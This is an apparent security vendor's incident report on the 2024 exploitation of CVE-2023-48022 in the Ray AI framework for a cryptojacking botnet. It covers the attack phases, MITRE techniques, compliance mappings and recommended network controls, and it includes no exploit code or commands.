Hackers Exploit Ray AI to Launch Global Cryptojacking Botnet (2024)
Executive Summary
In late 2024, malicious actors exploited an unauthenticated remote code execution vulnerability (CVE-2023-48022) in the open-source Ray AI framework, transforming exposed development environments into a globally distributed cryptojacking operation. Attackers leveraged Ray's scheduling and orchestration APIs to gain unauthorized access and deploy cryptomining payloads, particularly targeting environments with premium NVIDIA A100 GPUs. The campaign, identified by Oligo Security, unfolded in multiple phases: after initial malware delivery via GitLab infrastructure was disrupted, attackers quickly shifted to hosting on GitHub to sustain their operation. Over 200,000 exposed Ray clusters worldwide were at risk, significantly impacting cloud AI operations, startups, and research environments.
This incident marks a major evolution in threat actor adaptation: rather than exploiting traditional network vulnerabilities, adversaries weaponized trusted automation features to evade detection and maximize illicit gain. The campaign illustrates mounting risks to cloud-hosted AI workloads, the dangers of insecure API exposure, and the urgent need for stringent internal network controls to defend against cryptojacking and abuse of compute resources.
Why This Matters Now
The persistent exposure of AI and cloud orchestration environments, combined with an unpatched and widely overlooked API vulnerability, creates a lucrative and easily exploited attack surface for threat actors. As AI adoption accelerates, failure to secure development pipelines and cloud resources from lateral movement, API abuse, and cryptojacking risks operational disruption and rising infrastructure costs now more than ever.
Attack Path Analysis
Attackers exploited a publicly exposed Ray API (CVE-2023-48022) on internet-facing AI clusters, gaining remote code execution without authentication. Using Ray’s internal scheduling functions, they escalated privileges to control orchestration and compute resources. The attackers moved laterally across Ray clusters, propagating malware jobs to additional nodes and cloud regions. Persistent command and control was maintained via externally accessible dashboards and job automation, allowing remote issuance of malicious instructions. While traditional data exfiltration was not the main motivation, attackers exported cryptocurrency mining payloads and obscured activity, directing profits to external wallets. The impact consisted of hijacked compute for cryptomining, significant consumption of GPU resources, and degraded service for legitimate users.
Kill Chain Progression
Initial Compromise
Description
Attackers remotely exploited the unauthenticated Ray Job Submission API (CVE-2023-48022) on exposed cloud AI clusters, gaining initial execution access.
Related CVEs
CVE-2023-48022
CVSS 9.8Anyscale Ray versions 2.6.3 and 2.8.0 allow remote attackers to execute arbitrary code via the job submission API due to lack of authentication.
Affected Products:
Anyscale Ray – 2.6.3, 2.8.0
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Exploit Public-Facing Application
Command and Scripting Interpreter: Python
User Execution: Malicious File
Impair Defenses: Disable or Modify Tools
Masquerading: Match Legitimate Name or Location
Resource Hijacking
Ingress Tool Transfer
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Public-Facing Application Security
Control ID: 6.4.3
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Systems Security Controls
Control ID: Article 9(2)
CISA Zero Trust Maturity Model 2.0 – Isolate Management Interfaces
Control ID: Pillar: Network & Environment / Control: Secure Administration
NIS2 Directive – Cybersecurity risk-management measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Information Technology/IT
Ray framework cryptojacking exploits exposed AI infrastructure through unpatched CVE-2023-48022, targeting premium GPU resources in cloud environments requiring enhanced egress security and anomaly detection capabilities.
Computer Software/Engineering
Open-source AI development environments face self-propagating cryptojacking attacks via Job Submission API vulnerabilities, demanding zero trust segmentation and multicloud visibility for DevOps security governance.
Higher Education/Acadamia
Research labs using Ray clusters vulnerable to autonomous cryptojacking operations stealing NVIDIA A100 GPU resources, requiring kubernetes security and threat detection for academic computing infrastructure protection.
Biotechnology/Greentech
AI-powered biotech startups utilizing Ray framework face cryptojacking risks in cloud-hosted environments, necessitating encrypted traffic monitoring and east-west traffic security for research data protection compliance.
Sources
- Hackers turn open-source AI framework into global cryptojacking operationhttps://cyberscoop.com/ray-ai-cryptojacking-vulnerability-exposed-clusters-attack-oligo-security/Verified
- CVE-2023-48022 Impact, Exploitability, and Mitigation Steps | Wizhttps://www.wiz.io/vulnerability-database/cve/cve-2023-48022Verified
- Two-Year-Old Ray AI Framework Flaw Exploited in Ongoing Campaign - SecurityWeekhttps://www.securityweek.com/two-year-old-ray-ai-framework-flaw-exploited-in-ongoing-campaign/Verified
- NVD - CVE-2023-48022https://nvd.nist.gov/vuln/detail/CVE-2023-48022Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
CNSF controls such as Zero Trust Segmentation, east-west traffic enforcement, egress filtering, and real-time anomaly detection would have constrained adversary movement and reduced attacker dwell time. Distributing policy and inspecting internal flows would have either blocked, detected, or limited the cryptojacking campaign’s propagation and outbound mining activity.
Control: Zero Trust Segmentation
Mitigation: Prevents unauthorized public network access to sensitive workloads.
Control: Kubernetes Security (AKF)
Mitigation: Limits unauthorized task execution and narrows privilege scope.
Control: East-West Traffic Security
Mitigation: Blocks malicious internal lateral propagation.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: Detects and intervenes on anomalous C2 behaviors.
Control: Egress Security & Policy Enforcement
Mitigation: Blocks or alerts on unauthorized outbound mining and data transfer.
Rapid detection and automated incident response limit attacker resource consumption.
Impact at a Glance
Affected Business Functions
- AI Model Training
- Data Processing
- Research and Development
Estimated downtime: 7 days
Estimated loss: $500,000
Potential exposure of sensitive credentials, including OpenAI tokens, Stripe tokens, Hugging Face tokens, Slack tokens, production database credentials, and SSH keys.
Recommended Actions
Key Takeaways & Next Steps
- • Immediately restrict sensitive APIs and orchestration dashboards to trusted internal networks using zero trust segmentation.
- • Deploy east-west microsegmentation to block unauthorized lateral network movements within cloud clusters.
- • Enforce strict egress controls and outbound policy enforcement to prevent cryptojacking traffic from reaching miner pools.
- • Integrate distributed real-time detection for anomalous task scheduling, runtime abuse, and resource spikes.
- • Regularly audit cloud workload exposures and apply centralized visibility tools to discover and remediate misconfigurations.
